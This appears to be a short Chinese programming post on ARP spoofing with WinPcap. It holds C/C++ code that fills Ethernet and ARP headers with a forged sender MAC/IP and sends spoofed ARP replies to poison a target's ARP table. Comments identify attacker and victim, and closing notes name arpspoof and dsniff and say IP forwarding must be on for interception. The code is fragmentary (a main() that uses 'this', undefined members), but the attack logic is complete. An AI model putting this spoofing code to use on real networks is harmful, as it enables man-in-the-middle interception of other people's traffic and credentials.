ARP攻击 winpcap

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗。解决办法详见百科

#define ETHER_ADDR_LEN 6
typedef struct
{
    u_char DestMAC[ETHER_ADDR_LEN];          //目的MAC地址 6字节
    u_char SourMAC[ETHER_ADDR_LEN];          //源MAC地址 6字节
    u_short EthType;                         //上一层协议类型，如0x0800代表上一层是IP协议，0x0806为arp  2字节
}EthernetHeader;

// 28 bytes ARP request/reply
typedef struct
{
    u_short HardwareType;          //硬件类型,2字节，定义运行ARP的网络的类型，以太网是类型1
    u_short ProtocolType;          //协议类型,2字节，定义上层协议类型，对于IPV4协议，该字段值为0800
    u_char HardwareAddLen;         //硬件地址长度,8位字段，定义对应物理地址长度，以太网中这个值为6
    u_char ProtocolAddLen;         //协议地址长度,8位字段，定义以字节为单位的逻辑地址长度，对IPV4协议这个值为4
    u_short OperationField;        //操作字段,数据包类型,ARP请求（值为1），或者ARP应答（值为2）
    u_char SourceMacAdd[6];        //源（发送端）mac地址,可变长度字段，对以太网这个字段是6字节长
    u_char SourceIpAdd[4];         //源（发送短）ip地址,发送端协议地址，可变长度字段，对IP协议，这个字段是4字节长
    u_char DestMacAdd[6];          //目的（接收端）mac地址
    u_char DestIpAdd[4];           //目的（接收端）ip地址,注意不能为u_int型，结构体对其
}ArpHeader;

//封装以太网头
void fillEthernetPacket(u_char *sourMAC, u_char *destMAC)
{
    memset(&this->ethHdr, 0, sizeof(this->ethHdr));
    memcpy(this->ethHdr.SourMAC, sourMAC, sizeof(this->ethHdr.SourMAC));
    memcpy(this->ethHdr.DestMAC, destMAC, sizeof(this->ethHdr.DestMAC));
    this->ethHdr.EthType = htons(ARP_TYPE);
}

//封装ARP头
void fillArpPacket(u_char* srcMac,char *srcIp,u_char *destMac,char *destIp)
{
    this->arpHdr.HardwareAddLen = 6;
    this->arpHdr.ProtocolAddLen = 4;

    this->arpHdr.HardwareType = htons(ARP_HARDWARE);
    this->arpHdr.ProtocolType = htons(IP_TYPE);
    this->arpHdr.OperationField = htons(ARP_REPLY);
    memcpy(this->arpHdr.SourceMacAdd, srcMac, sizeof(this->arpHdr.SourceMacAdd));
    memcpy(this->arpHdr.DestMacAdd, destMac, sizeof(this->arpHdr.DestMacAdd));
    u_long srcIpN = htonl(pcap.my_inet_addr(srcIp));
    memcpy(this->arpHdr.SourceIpAdd, (u_char*)&srcIpN, sizeof(this->arpHdr.SourceIpAdd));
    u_long destIpN = htonl(pcap.my_inet_addr(destIp));
    memcpy(this->arpHdr.DestIpAdd, (u_char*)&destIpN, sizeof(this->arpHdr.DestIpAdd));
}

//封装ARP包
void fillPacket()
{
    memset(this->packet, 0, sizeof(this->packet));

    // 填充以太网头，为广播方式
    memcpy(this->packet, &this->ethHdr, ETHERNET_HEAD_LENGTH);

    // 填充arp头
    memcpy(this->packet + ETHERNET_HEAD_LENGTH, &this->arpHdr, ARP_BODY_LENGTH);
}

// 发送ARP欺骗包
void sendArpCheatPacket()
{
    /* Send down the packet */
    if (pcap_sendpacket(this->adhandle,	// Adapter
                        packet,				// buffer with the packet
                        ARP_PACKET_LENGTH	// size
                        ) != 0)
    {
        qDebug("\nError sending the packet: %s\n", pcap_geterr(this->adhandle));
        return;
    }
}

int main()
{
    /*
     * hostInfo.mac：攻击者MAC
     * cheatHostInfo.mac：攻击对象MAC
     */
    fillEthernetPacket(this->hostInfo.mac, cheatHostInfo.mac);

    /*
     * hostInfo.mac：攻击目标ARP表中，hostInfo.ip对应的mac替换为此mac地址
     * hostInfo.ip：攻击目标ARP表中，被替换mac的ip地址
     * cheatHostInfo.mac：攻击目标mac地址
     * cheatHostInfo.ip：攻击目标ip地址
     */
    fillArpPacket(this->hostInfo.mac, this->hostInfo.ip,
                  cheatHostInfo.mac, cheatHostInfo.ip);

    sendArpCheatPacket();
}

当攻击目标发送ARP请求的时候，ARP欺骗回应包就会更新其ARP表

相关工具包介绍
arpspoof：arp欺骗的工具
dsniff：网络嗅探工具包

注：需要打开IP转发